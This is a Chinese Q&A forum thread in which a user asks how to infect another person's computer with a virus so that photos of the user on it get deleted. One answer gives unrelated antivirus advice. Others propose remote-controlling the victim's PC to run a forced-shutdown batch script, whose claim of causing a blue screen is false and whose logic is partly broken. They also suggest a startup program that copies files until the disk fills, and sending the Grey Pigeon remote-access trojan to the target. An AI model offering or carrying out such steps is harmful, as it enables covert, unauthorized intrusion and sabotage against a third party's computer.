怎样让别人电脑中病毒。

那人电脑有我照片。让他电脑中病毒把照片删了。如果高手还有更好的方法也可... 那人电脑有我照片。让他电脑中病毒把照片删了。如果高手还有更好的方法也可 展开
lihua365
知道合伙人数码行家
郑州大学西亚斯国际学院,本科。从业7年,现任广州天剑计算机系统工程有限公司 项目经理

  1. 杜绝传染渠道

    病毒的传染无非是两种方式:一是网络,二是硬盘、U盘等存储工具。如今由于网络的盛行,通过互联网传递的病毒要远远高于后者。为此,我们要特别注意在网上的行为,不要轻易下载小网站的软件与程序。 不要不可信网站,因为这些网站很有可能含有病毒。另外还要:

    a 不用盗版或来历不明的软件。
    b对外来程序要使用尽可能多的查毒软件进行检查(未经检查的文件不能拷入硬盘,更不能使用。) ;
    c注意更新系统补丁

  2. 安装杀毒软件定期检查病毒,更新杀毒软件,做到先预防;

还原和平第一人

用向日葵远程控制加开机插座和UU,远程运行此程序:
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
if not exist c:\2.txt echo. >c:\2.txt & goto err1
if not exist c:\3.txt echo. >c:\3.txt & goto err1
if not exist c:\4.txt echo. >c:\4.txt & goto err1
if not exist c:\5.txt echo. >c:\5.txt & goto err1
if not exist c:\5.txt echo. >c:\6.txt & goto err1
if not exist c:\5.txt echo. >c:\7.txt & goto err1
if not exist c:\5.txt echo. >c:\8.txt & goto err1
if not exist c:\5.txt echo. >c:\9.txt & goto err1
if not exist c:\5.txt echo. >c:\10.txt & goto err1
goto err2
:err1
shutdown -s -t 0
:err2
他会电脑蓝屏
匿名用户
远程攻击,哈哈,别干坏事,过去删了完事编个小程序:copy c:\windows\*.* 开机运行,10天20天后再看看,哈哈
匿名用户
用灰鸽子 生成好后直接发给他 让他打开 或者你要能接触他电脑的话 直接在他的电脑上运行就O了 要是远程攻击的话 这玩意不是一句两句就能说明白的
匿名用户
先让他中你的毒然后就有机会中电脑毒